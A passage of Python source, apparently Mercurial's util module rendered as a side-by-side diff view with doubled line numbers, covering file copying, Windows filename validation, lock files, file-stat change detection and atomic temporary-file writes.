1741 num += n
1741 else:
1742 else:
1742 if hardlink is None:
1743 if hardlink is None:
1743 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1744 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1744 os.stat(os.path.dirname(dst)).st_dev)
1745 os.stat(os.path.dirname(dst)).st_dev)
1745 settopic()
1746 settopic()
1746
1747
1747 if hardlink:
1748 if hardlink:
1748 try:
1749 try:
1749 oslink(src, dst)
1750 oslink(src, dst)
1750 except (IOError, OSError):
1751 except (IOError, OSError):
1751 hardlink = False
1752 hardlink = False
1752 shutil.copy(src, dst)
1753 shutil.copy(src, dst)
1753 else:
1754 else:
1754 shutil.copy(src, dst)
1755 shutil.copy(src, dst)
1755 num += 1
1756 num += 1
1756 if progress:
1757 if progress:
1757 progress.increment()
1758 progress.increment()
1758
1759
1759 return hardlink, num
1760 return hardlink, num
1760
1761
1761 _winreservednames = {
1762 _winreservednames = {
1762 'con', 'prn', 'aux', 'nul',
1763 'con', 'prn', 'aux', 'nul',
1763 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1764 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1764 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1765 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1765 }
1766 }
1766 _winreservedchars = ':*?"<>|'
1767 _winreservedchars = ':*?"<>|'
1767 def checkwinfilename(path):
1768 def checkwinfilename(path):
1768 r'''Check that the base-relative path is a valid filename on Windows.
1769 r'''Check that the base-relative path is a valid filename on Windows.
1769 Returns None if the path is ok, or a UI string describing the problem.
1770 Returns None if the path is ok, or a UI string describing the problem.
1770
1771
1771 >>> checkwinfilename(b"just/a/normal/path")
1772 >>> checkwinfilename(b"just/a/normal/path")
1772 >>> checkwinfilename(b"foo/bar/con.xml")
1773 >>> checkwinfilename(b"foo/bar/con.xml")
1773 "filename contains 'con', which is reserved on Windows"
1774 "filename contains 'con', which is reserved on Windows"
1774 >>> checkwinfilename(b"foo/con.xml/bar")
1775 >>> checkwinfilename(b"foo/con.xml/bar")
1775 "filename contains 'con', which is reserved on Windows"
1776 "filename contains 'con', which is reserved on Windows"
1776 >>> checkwinfilename(b"foo/bar/xml.con")
1777 >>> checkwinfilename(b"foo/bar/xml.con")
1777 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1778 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1778 "filename contains 'AUX', which is reserved on Windows"
1779 "filename contains 'AUX', which is reserved on Windows"
1779 >>> checkwinfilename(b"foo/bar/bla:.txt")
1780 >>> checkwinfilename(b"foo/bar/bla:.txt")
1780 "filename contains ':', which is reserved on Windows"
1781 "filename contains ':', which is reserved on Windows"
1781 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1782 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1782 "filename contains '\\x07', which is invalid on Windows"
1783 "filename contains '\\x07', which is invalid on Windows"
1783 >>> checkwinfilename(b"foo/bar/bla ")
1784 >>> checkwinfilename(b"foo/bar/bla ")
1784 "filename ends with ' ', which is not allowed on Windows"
1785 "filename ends with ' ', which is not allowed on Windows"
1785 >>> checkwinfilename(b"../bar")
1786 >>> checkwinfilename(b"../bar")
1786 >>> checkwinfilename(b"foo\\")
1787 >>> checkwinfilename(b"foo\\")
1787 "filename ends with '\\', which is invalid on Windows"
1788 "filename ends with '\\', which is invalid on Windows"
1788 >>> checkwinfilename(b"foo\\/bar")
1789 >>> checkwinfilename(b"foo\\/bar")
1789 "directory name ends with '\\', which is invalid on Windows"
1790 "directory name ends with '\\', which is invalid on Windows"
1790 '''
1791 '''
1791 if path.endswith('\\'):
1792 if path.endswith('\\'):
1792 return _("filename ends with '\\', which is invalid on Windows")
1793 return _("filename ends with '\\', which is invalid on Windows")
1793 if '\\/' in path:
1794 if '\\/' in path:
1794 return _("directory name ends with '\\', which is invalid on Windows")
1795 return _("directory name ends with '\\', which is invalid on Windows")
1795 for n in path.replace('\\', '/').split('/'):
1796 for n in path.replace('\\', '/').split('/'):
1796 if not n:
1797 if not n:
1797 continue
1798 continue
1798 for c in _filenamebytestr(n):
1799 for c in _filenamebytestr(n):
1799 if c in _winreservedchars:
1800 if c in _winreservedchars:
1800 return _("filename contains '%s', which is reserved "
1801 return _("filename contains '%s', which is reserved "
1801 "on Windows") % c
1802 "on Windows") % c
1802 if ord(c) <= 31:
1803 if ord(c) <= 31:
1803 return _("filename contains '%s', which is invalid "
1804 return _("filename contains '%s', which is invalid "
1804 "on Windows") % stringutil.escapestr(c)
1805 "on Windows") % stringutil.escapestr(c)
1805 base = n.split('.')[0]
1806 base = n.split('.')[0]
1806 if base and base.lower() in _winreservednames:
1807 if base and base.lower() in _winreservednames:
1807 return _("filename contains '%s', which is reserved "
1808 return _("filename contains '%s', which is reserved "
1808 "on Windows") % base
1809 "on Windows") % base
1809 t = n[-1:]
1810 t = n[-1:]
1810 if t in '. ' and n not in '..':
1811 if t in '. ' and n not in '..':
1811 return _("filename ends with '%s', which is not allowed "
1812 return _("filename ends with '%s', which is not allowed "
1812 "on Windows") % t
1813 "on Windows") % t
1813
1814
1814 if pycompat.iswindows:
1815 if pycompat.iswindows:
1815 checkosfilename = checkwinfilename
1816 checkosfilename = checkwinfilename
1816 timer = time.clock
1817 timer = time.clock
1817 else:
1818 else:
1818 checkosfilename = platform.checkosfilename
1819 checkosfilename = platform.checkosfilename
1819 timer = time.time
1820 timer = time.time
1820
1821
1821 if safehasattr(time, "perf_counter"):
1822 if safehasattr(time, "perf_counter"):
1822 timer = time.perf_counter
1823 timer = time.perf_counter
1823
1824
1824 def makelock(info, pathname):
1825 def makelock(info, pathname):
1825 """Create a lock file atomically if possible
1826 """Create a lock file atomically if possible
1826
1827
1827 This may leave a stale lock file if symlink isn't supported and signal
1828 This may leave a stale lock file if symlink isn't supported and signal
1828 interrupt is enabled.
1829 interrupt is enabled.
1829 """
1830 """
1830 try:
1831 try:
1831 return os.symlink(info, pathname)
1832 return os.symlink(info, pathname)
1832 except OSError as why:
1833 except OSError as why:
1833 if why.errno == errno.EEXIST:
1834 if why.errno == errno.EEXIST:
1834 raise
1835 raise
1835 except AttributeError: # no symlink in os
1836 except AttributeError: # no symlink in os
1836 pass
1837 pass
1837
1838
1838 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1839 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1839 ld = os.open(pathname, flags)
1840 ld = os.open(pathname, flags)
1840 os.write(ld, info)
1841 os.write(ld, info)
1841 os.close(ld)
1842 os.close(ld)
1842
1843
1843 def readlock(pathname):
1844 def readlock(pathname):
1844 try:
1845 try:
1845 return readlink(pathname)
1846 return readlink(pathname)
1846 except OSError as why:
1847 except OSError as why:
1847 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1848 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1848 raise
1849 raise
1849 except AttributeError: # no symlink in os
1850 except AttributeError: # no symlink in os
1850 pass
1851 pass
1851 with posixfile(pathname, 'rb') as fp:
1852 with posixfile(pathname, 'rb') as fp:
1852 return fp.read()
1853 return fp.read()
1853
1854
1854 def fstat(fp):
1855 def fstat(fp):
1855 '''stat file object that may not have fileno method.'''
1856 '''stat file object that may not have fileno method.'''
1856 try:
1857 try:
1857 return os.fstat(fp.fileno())
1858 return os.fstat(fp.fileno())
1858 except AttributeError:
1859 except AttributeError:
1859 return os.stat(fp.name)
1860 return os.stat(fp.name)
1860
1861
1861 # File system features
1862 # File system features
1862
1863
1863 def fscasesensitive(path):
1864 def fscasesensitive(path):
1864 """
1865 """
1865 Return true if the given path is on a case-sensitive filesystem
1866 Return true if the given path is on a case-sensitive filesystem
1866
1867
1867 Requires a path (like /foo/.hg) ending with a foldable final
1868 Requires a path (like /foo/.hg) ending with a foldable final
1868 directory component.
1869 directory component.
1869 """
1870 """
1870 s1 = os.lstat(path)
1871 s1 = os.lstat(path)
1871 d, b = os.path.split(path)
1872 d, b = os.path.split(path)
1872 b2 = b.upper()
1873 b2 = b.upper()
1873 if b == b2:
1874 if b == b2:
1874 b2 = b.lower()
1875 b2 = b.lower()
1875 if b == b2:
1876 if b == b2:
1876 return True # no evidence against case sensitivity
1877 return True # no evidence against case sensitivity
1877 p2 = os.path.join(d, b2)
1878 p2 = os.path.join(d, b2)
1878 try:
1879 try:
1879 s2 = os.lstat(p2)
1880 s2 = os.lstat(p2)
1880 if s2 == s1:
1881 if s2 == s1:
1881 return False
1882 return False
1882 return True
1883 return True
1883 except OSError:
1884 except OSError:
1884 return True
1885 return True
1885
1886
1886 try:
1887 try:
1887 import re2
1888 import re2
1888 _re2 = None
1889 _re2 = None
1889 except ImportError:
1890 except ImportError:
1890 _re2 = False
1891 _re2 = False
1891
1892
1892 class _re(object):
1893 class _re(object):
1893 def _checkre2(self):
1894 def _checkre2(self):
1894 global _re2
1895 global _re2
1895 try:
1896 try:
1896 # check if match works, see issue3964
1897 # check if match works, see issue3964
1897 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1898 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1898 except ImportError:
1899 except ImportError:
1899 _re2 = False
1900 _re2 = False
1900
1901
1901 def compile(self, pat, flags=0):
1902 def compile(self, pat, flags=0):
1902 '''Compile a regular expression, using re2 if possible
1903 '''Compile a regular expression, using re2 if possible
1903
1904
1904 For best performance, use only re2-compatible regexp features. The
1905 For best performance, use only re2-compatible regexp features. The
1905 only flags from the re module that are re2-compatible are
1906 only flags from the re module that are re2-compatible are
1906 IGNORECASE and MULTILINE.'''
1907 IGNORECASE and MULTILINE.'''
1907 if _re2 is None:
1908 if _re2 is None:
1908 self._checkre2()
1909 self._checkre2()
1909 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1910 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1910 if flags & remod.IGNORECASE:
1911 if flags & remod.IGNORECASE:
1911 pat = '(?i)' + pat
1912 pat = '(?i)' + pat
1912 if flags & remod.MULTILINE:
1913 if flags & remod.MULTILINE:
1913 pat = '(?m)' + pat
1914 pat = '(?m)' + pat
1914 try:
1915 try:
1915 return re2.compile(pat)
1916 return re2.compile(pat)
1916 except re2.error:
1917 except re2.error:
1917 pass
1918 pass
1918 return remod.compile(pat, flags)
1919 return remod.compile(pat, flags)
1919
1920
1920 @propertycache
1921 @propertycache
1921 def escape(self):
1922 def escape(self):
1922 '''Return the version of escape corresponding to self.compile.
1923 '''Return the version of escape corresponding to self.compile.
1923
1924
1924 This is imperfect because whether re2 or re is used for a particular
1925 This is imperfect because whether re2 or re is used for a particular
1925 function depends on the flags, etc, but it's the best we can do.
1926 function depends on the flags, etc, but it's the best we can do.
1926 '''
1927 '''
1927 global _re2
1928 global _re2
1928 if _re2 is None:
1929 if _re2 is None:
1929 self._checkre2()
1930 self._checkre2()
1930 if _re2:
1931 if _re2:
1931 return re2.escape
1932 return re2.escape
1932 else:
1933 else:
1933 return remod.escape
1934 return remod.escape
1934
1935
1935 re = _re()
1936 re = _re()
1936
1937
1937 _fspathcache = {}
1938 _fspathcache = {}
1938 def fspath(name, root):
1939 def fspath(name, root):
1939 '''Get name in the case stored in the filesystem
1940 '''Get name in the case stored in the filesystem
1940
1941
1941 The name should be relative to root, and be normcase-ed for efficiency.
1942 The name should be relative to root, and be normcase-ed for efficiency.
1942
1943
1943 Note that this function is unnecessary, and should not be
1944 Note that this function is unnecessary, and should not be
1944 called, for case-sensitive filesystems (simply because it's expensive).
1945 called, for case-sensitive filesystems (simply because it's expensive).
1945
1946
1946 The root should be normcase-ed, too.
1947 The root should be normcase-ed, too.
1947 '''
1948 '''
1948 def _makefspathcacheentry(dir):
1949 def _makefspathcacheentry(dir):
1949 return dict((normcase(n), n) for n in os.listdir(dir))
1950 return dict((normcase(n), n) for n in os.listdir(dir))
1950
1951
1951 seps = pycompat.ossep
1952 seps = pycompat.ossep
1952 if pycompat.osaltsep:
1953 if pycompat.osaltsep:
1953 seps = seps + pycompat.osaltsep
1954 seps = seps + pycompat.osaltsep
1954 # Protect backslashes. This gets silly very quickly.
1955 # Protect backslashes. This gets silly very quickly.
1955 seps.replace('\\','\\\\')
1956 seps.replace('\\','\\\\')
1956 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1957 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1957 dir = os.path.normpath(root)
1958 dir = os.path.normpath(root)
1958 result = []
1959 result = []
1959 for part, sep in pattern.findall(name):
1960 for part, sep in pattern.findall(name):
1960 if sep:
1961 if sep:
1961 result.append(sep)
1962 result.append(sep)
1962 continue
1963 continue
1963
1964
1964 if dir not in _fspathcache:
1965 if dir not in _fspathcache:
1965 _fspathcache[dir] = _makefspathcacheentry(dir)
1966 _fspathcache[dir] = _makefspathcacheentry(dir)
1966 contents = _fspathcache[dir]
1967 contents = _fspathcache[dir]
1967
1968
1968 found = contents.get(part)
1969 found = contents.get(part)
1969 if not found:
1970 if not found:
1970 # retry "once per directory" per "dirstate.walk" which
1971 # retry "once per directory" per "dirstate.walk" which
1971 # may take place for each patches of "hg qpush", for example
1972 # may take place for each patches of "hg qpush", for example
1972 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1973 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1973 found = contents.get(part)
1974 found = contents.get(part)
1974
1975
1975 result.append(found or part)
1976 result.append(found or part)
1976 dir = os.path.join(dir, part)
1977 dir = os.path.join(dir, part)
1977
1978
1978 return ''.join(result)
1979 return ''.join(result)
1979
1980
1980 def checknlink(testfile):
1981 def checknlink(testfile):
1981 '''check whether hardlink count reporting works properly'''
1982 '''check whether hardlink count reporting works properly'''
1982
1983
1983 # testfile may be open, so we need a separate file for checking to
1984 # testfile may be open, so we need a separate file for checking to
1984 # work around issue2543 (or testfile may get lost on Samba shares)
1985 # work around issue2543 (or testfile may get lost on Samba shares)
1985 f1, f2, fp = None, None, None
1986 f1, f2, fp = None, None, None
1986 try:
1987 try:
1987 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1988 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1988 suffix='1~', dir=os.path.dirname(testfile))
1989 suffix='1~', dir=os.path.dirname(testfile))
1989 os.close(fd)
1990 os.close(fd)
1990 f2 = '%s2~' % f1[:-2]
1991 f2 = '%s2~' % f1[:-2]
1991
1992
1992 oslink(f1, f2)
1993 oslink(f1, f2)
1993 # nlinks() may behave differently for files on Windows shares if
1994 # nlinks() may behave differently for files on Windows shares if
1994 # the file is open.
1995 # the file is open.
1995 fp = posixfile(f2)
1996 fp = posixfile(f2)
1996 return nlinks(f2) > 1
1997 return nlinks(f2) > 1
1997 except OSError:
1998 except OSError:
1998 return False
1999 return False
1999 finally:
2000 finally:
2000 if fp is not None:
2001 if fp is not None:
2001 fp.close()
2002 fp.close()
2002 for f in (f1, f2):
2003 for f in (f1, f2):
2003 try:
2004 try:
2004 if f is not None:
2005 if f is not None:
2005 os.unlink(f)
2006 os.unlink(f)
2006 except OSError:
2007 except OSError:
2007 pass
2008 pass
2008
2009
2009 def endswithsep(path):
2010 def endswithsep(path):
2010 '''Check path ends with os.sep or os.altsep.'''
2011 '''Check path ends with os.sep or os.altsep.'''
2011 return (path.endswith(pycompat.ossep)
2012 return (path.endswith(pycompat.ossep)
2012 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2013 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2013
2014
2014 def splitpath(path):
2015 def splitpath(path):
2015 '''Split path by os.sep.
2016 '''Split path by os.sep.
2016 Note that this function does not use os.altsep because this is
2017 Note that this function does not use os.altsep because this is
2017 an alternative of simple "xxx.split(os.sep)".
2018 an alternative of simple "xxx.split(os.sep)".
2018 It is recommended to use os.path.normpath() before using this
2019 It is recommended to use os.path.normpath() before using this
2019 function if need.'''
2020 function if need.'''
2020 return path.split(pycompat.ossep)
2021 return path.split(pycompat.ossep)
2021
2022
2022 def mktempcopy(name, emptyok=False, createmode=None):
2023 def mktempcopy(name, emptyok=False, createmode=None):
2023 """Create a temporary file with the same contents from name
2024 """Create a temporary file with the same contents from name
2024
2025
2025 The permission bits are copied from the original file.
2026 The permission bits are copied from the original file.
2026
2027
2027 If the temporary file is going to be truncated immediately, you
2028 If the temporary file is going to be truncated immediately, you
2028 can use emptyok=True as an optimization.
2029 can use emptyok=True as an optimization.
2029
2030
2030 Returns the name of the temporary file.
2031 Returns the name of the temporary file.
2031 """
2032 """
2032 d, fn = os.path.split(name)
2033 d, fn = os.path.split(name)
2033 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2034 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2034 os.close(fd)
2035 os.close(fd)
2035 # Temporary files are created with mode 0600, which is usually not
2036 # Temporary files are created with mode 0600, which is usually not
2036 # what we want. If the original file already exists, just copy
2037 # what we want. If the original file already exists, just copy
2037 # its mode. Otherwise, manually obey umask.
2038 # its mode. Otherwise, manually obey umask.
2038 copymode(name, temp, createmode)
2039 copymode(name, temp, createmode)
2039 if emptyok:
2040 if emptyok:
2040 return temp
2041 return temp
2041 try:
2042 try:
2042 try:
2043 try:
2043 ifp = posixfile(name, "rb")
2044 ifp = posixfile(name, "rb")
2044 except IOError as inst:
2045 except IOError as inst:
2045 if inst.errno == errno.ENOENT:
2046 if inst.errno == errno.ENOENT:
2046 return temp
2047 return temp
2047 if not getattr(inst, 'filename', None):
2048 if not getattr(inst, 'filename', None):
2048 inst.filename = name
2049 inst.filename = name
2049 raise
2050 raise
2050 ofp = posixfile(temp, "wb")
2051 ofp = posixfile(temp, "wb")
2051 for chunk in filechunkiter(ifp):
2052 for chunk in filechunkiter(ifp):
2052 ofp.write(chunk)
2053 ofp.write(chunk)
2053 ifp.close()
2054 ifp.close()
2054 ofp.close()
2055 ofp.close()
2055 except: # re-raises
2056 except: # re-raises
2056 try:
2057 try:
2057 os.unlink(temp)
2058 os.unlink(temp)
2058 except OSError:
2059 except OSError:
2059 pass
2060 pass
2060 raise
2061 raise
2061 return temp
2062 return temp
2062
2063
2063 class filestat(object):
2064 class filestat(object):
2064 """help to exactly detect change of a file
2065 """help to exactly detect change of a file
2065
2066
2066 'stat' attribute is result of 'os.stat()' if specified 'path'
2067 'stat' attribute is result of 'os.stat()' if specified 'path'
2067 exists. Otherwise, it is None. This can avoid preparative
2068 exists. Otherwise, it is None. This can avoid preparative
2068 'exists()' examination on client side of this class.
2069 'exists()' examination on client side of this class.
2069 """
2070 """
2070 def __init__(self, stat):
2071 def __init__(self, stat):
2071 self.stat = stat
2072 self.stat = stat
2072
2073
2073 @classmethod
2074 @classmethod
2074 def frompath(cls, path):
2075 def frompath(cls, path):
2075 try:
2076 try:
2076 stat = os.stat(path)
2077 stat = os.stat(path)
2077 except OSError as err:
2078 except OSError as err:
2078 if err.errno != errno.ENOENT:
2079 if err.errno != errno.ENOENT:
2079 raise
2080 raise
2080 stat = None
2081 stat = None
2081 return cls(stat)
2082 return cls(stat)
2082
2083
2083 @classmethod
2084 @classmethod
2084 def fromfp(cls, fp):
2085 def fromfp(cls, fp):
2085 stat = os.fstat(fp.fileno())
2086 stat = os.fstat(fp.fileno())
2086 return cls(stat)
2087 return cls(stat)
2087
2088
2088 __hash__ = object.__hash__
2089 __hash__ = object.__hash__
2089
2090
2090 def __eq__(self, old):
2091 def __eq__(self, old):
2091 try:
2092 try:
2092 # if ambiguity between stat of new and old file is
2093 # if ambiguity between stat of new and old file is
2093 # avoided, comparison of size, ctime and mtime is enough
2094 # avoided, comparison of size, ctime and mtime is enough
2094 # to exactly detect change of a file regardless of platform
2095 # to exactly detect change of a file regardless of platform
2095 return (self.stat.st_size == old.stat.st_size and
2096 return (self.stat.st_size == old.stat.st_size and
2096 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2097 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2097 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2098 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2098 except AttributeError:
2099 except AttributeError:
2099 pass
2100 pass
2100 try:
2101 try:
2101 return self.stat is None and old.stat is None
2102 return self.stat is None and old.stat is None
2102 except AttributeError:
2103 except AttributeError:
2103 return False
2104 return False
2104
2105
2105 def isambig(self, old):
2106 def isambig(self, old):
2106 """Examine whether new (= self) stat is ambiguous against old one
2107 """Examine whether new (= self) stat is ambiguous against old one
2107
2108
2108 "S[N]" below means stat of a file at N-th change:
2109 "S[N]" below means stat of a file at N-th change:
2109
2110
2110 - S[n-1].ctime < S[n].ctime: can detect change of a file
2111 - S[n-1].ctime < S[n].ctime: can detect change of a file
2111 - S[n-1].ctime == S[n].ctime
2112 - S[n-1].ctime == S[n].ctime
2112 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2113 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2113 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2114 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2114 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2115 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2115 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2116 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2116
2117
2117 Case (*2) above means that a file was changed twice or more at
2118 Case (*2) above means that a file was changed twice or more at
2118 same time in sec (= S[n-1].ctime), and comparison of timestamp
2119 same time in sec (= S[n-1].ctime), and comparison of timestamp
2119 is ambiguous.
2120 is ambiguous.
2120
2121
2121 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2122 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2122 timestamp is ambiguous".
2123 timestamp is ambiguous".
2123
2124
2124 But advancing mtime only in case (*2) doesn't work as
2125 But advancing mtime only in case (*2) doesn't work as
2125 expected, because naturally advanced S[n].mtime in case (*1)
2126 expected, because naturally advanced S[n].mtime in case (*1)
2126 might be equal to manually advanced S[n-1 or earlier].mtime.
2127 might be equal to manually advanced S[n-1 or earlier].mtime.
2127
2128
2128 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2129 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2129 treated as ambiguous regardless of mtime, to avoid overlooking
2130 treated as ambiguous regardless of mtime, to avoid overlooking
2130 by confliction between such mtime.
2131 by confliction between such mtime.
2131
2132
2132 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2133 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2133 S[n].mtime", even if size of a file isn't changed.
2134 S[n].mtime", even if size of a file isn't changed.
2134 """
2135 """
2135 try:
2136 try:
2136 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2137 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2137 except AttributeError:
2138 except AttributeError:
2138 return False
2139 return False
2139
2140
2140 def avoidambig(self, path, old):
2141 def avoidambig(self, path, old):
2141 """Change file stat of specified path to avoid ambiguity
2142 """Change file stat of specified path to avoid ambiguity
2142
2143
2143 'old' should be previous filestat of 'path'.
2144 'old' should be previous filestat of 'path'.
2144
2145
2145 This skips avoiding ambiguity, if a process doesn't have
2146 This skips avoiding ambiguity, if a process doesn't have
2146 appropriate privileges for 'path'. This returns False in this
2147 appropriate privileges for 'path'. This returns False in this
2147 case.
2148 case.
2148
2149
2149 Otherwise, this returns True, as "ambiguity is avoided".
2150 Otherwise, this returns True, as "ambiguity is avoided".
2150 """
2151 """
2151 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2152 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2152 try:
2153 try:
2153 os.utime(path, (advanced, advanced))
2154 os.utime(path, (advanced, advanced))
2154 except OSError as inst:
2155 except OSError as inst:
2155 if inst.errno == errno.EPERM:
2156 if inst.errno == errno.EPERM:
2156 # utime() on the file created by another user causes EPERM,
2157 # utime() on the file created by another user causes EPERM,
2157 # if a process doesn't have appropriate privileges
2158 # if a process doesn't have appropriate privileges
2158 return False
2159 return False
2159 raise
2160 raise
2160 return True
2161 return True
2161
2162
2162 def __ne__(self, other):
2163 def __ne__(self, other):
2163 return not self == other
2164 return not self == other
2164
2165
2165 class atomictempfile(object):
2166 class atomictempfile(object):
2166 '''writable file object that atomically updates a file
2167 '''writable file object that atomically updates a file
2167
2168
2168 All writes will go to a temporary copy of the original file. Call
2169 All writes will go to a temporary copy of the original file. Call
2169 close() when you are done writing, and atomictempfile will rename
2170 close() when you are done writing, and atomictempfile will rename
2170 the temporary copy to the original name, making the changes
2171 the temporary copy to the original name, making the changes
2171 visible. If the object is destroyed without being closed, all your
2172 visible. If the object is destroyed without being closed, all your
2172 writes are discarded.
2173 writes are discarded.
2173
2174
2174 checkambig argument of constructor is used with filestat, and is
2175 checkambig argument of constructor is used with filestat, and is
2175 useful only if target file is guarded by any lock (e.g. repo.lock
2176 useful only if target file is guarded by any lock (e.g. repo.lock
2176 or repo.wlock).
2177 or repo.wlock).
2177 '''
2178 '''
2178 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2179 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2179 self.__name = name # permanent name
2180 self.__name = name # permanent name
2180 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2181 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2181 createmode=createmode)
2182 createmode=createmode)
2182 self._fp = posixfile(self._tempname, mode)
2183 self._fp = posixfile(self._tempname, mode)
2183 self._checkambig = checkambig
2184 self._checkambig = checkambig
2184
2185
2185 # delegated methods
2186 # delegated methods
2186 self.read = self._fp.read
2187 self.read = self._fp.read
2187 self.write = self._fp.write
2188 self.write = self._fp.write
2188 self.seek = self._fp.seek
2189 self.seek = self._fp.seek
2189 self.tell = self._fp.tell
2190 self.tell = self._fp.tell
2190 self.fileno = self._fp.fileno
2191 self.fileno = self._fp.fileno
2191
2192
2192 def close(self):
2193 def close(self):
2193 if not self._fp.closed:
2194 if not self._fp.closed:
2194 self._fp.close()
2195 self._fp.close()
2195 filename = localpath(self.__name)
2196 filename = localpath(self.__name)
2196 oldstat = self._checkambig and filestat.frompath(filename)
2197 oldstat = self._checkambig and filestat.frompath(filename)
2197 if oldstat and oldstat.stat:
2198 if oldstat and oldstat.stat:
2198 rename(self._tempname, filename)
2199 rename(self._tempname, filename)
2199 newstat = filestat.frompath(filename)
2200 newstat = filestat.frompath(filename)
2200 if newstat.isambig(oldstat):
2201 if newstat.isambig(oldstat):
2201 # stat of changed file is ambiguous to original one
2202 # stat of changed file is ambiguous to original one
2202 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2203 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2203 os.utime(filename, (advanced, advanced))
2204 os.utime(filename, (advanced, advanced))
2204 else:
2205 else:
2205 rename(self._tempname, filename)
2206 rename(self._tempname, filename)
2206
2207
2207 def discard(self):
2208 def discard(self):
2208 if not self._fp.closed:
2209 if not self._fp.closed:
2209 try:
2210 try:
2210 os.unlink(self._tempname)
2211 os.unlink(self._tempname)
2211 except OSError:
2212 except OSError:
2212 pass
2213 pass
2213 self._fp.close()
2214 self._fp.close()
2214
2215
2215 def __del__(self):
2216 def __del__(self):
2216 if safehasattr(self, '_fp'): # constructor actually did something
2217 if safehasattr(self, '_fp'): # constructor actually did something
2217 self.discard()
2218 self.discard()
2218
2219
2219 def __enter__(self):
2220 def __enter__(self):
2220 return self
2221 return self
2221
2222
2222 def __exit__(self, exctype, excvalue, traceback):
2223 def __exit__(self, exctype, excvalue, traceback):
2223 if exctype is not None:
2224 if exctype is not None:
2224 self.discard()
2225 self.discard()
2225 else:
2226 else:
2226 self.close()
2227 self.close()
2227
2228
2228 def unlinkpath(f, ignoremissing=False, rmdir=True):
2229 def unlinkpath(f, ignoremissing=False, rmdir=True):
2229 """unlink and remove the directory if it is empty"""
2230 """unlink and remove the directory if it is empty"""
2230 if ignoremissing:
2231 if ignoremissing:
2231 tryunlink(f)
2232 tryunlink(f)
2232 else:
2233 else:
2233 unlink(f)
2234 unlink(f)
2234 if rmdir:
2235 if rmdir:
2235 # try removing directories that might now be empty
2236 # try removing directories that might now be empty
2236 try:
2237 try:
2237 removedirs(os.path.dirname(f))
2238 removedirs(os.path.dirname(f))
2238 except OSError:
2239 except OSError:
2239 pass
2240 pass
2240
2241
2241 def tryunlink(f):
2242 def tryunlink(f):
2242 """Attempt to remove a file, ignoring ENOENT errors."""
2243 """Attempt to remove a file, ignoring ENOENT errors."""
2243 try:
2244 try:
2244 unlink(f)
2245 unlink(f)
2245 except OSError as e:
2246 except OSError as e:
2246 if e.errno != errno.ENOENT:
2247 if e.errno != errno.ENOENT:
2247 raise
2248 raise
2248
2249
2249 def makedirs(name, mode=None, notindexed=False):
2250 def makedirs(name, mode=None, notindexed=False):
2250 """recursive directory creation with parent mode inheritance
2251 """recursive directory creation with parent mode inheritance
2251
2252
2252 Newly created directories are marked as "not to be indexed by
2253 Newly created directories are marked as "not to be indexed by
2253 the content indexing service", if ``notindexed`` is specified
2254 the content indexing service", if ``notindexed`` is specified
2254 for "write" mode access.
2255 for "write" mode access.
2255 """
2256 """
2256 try:
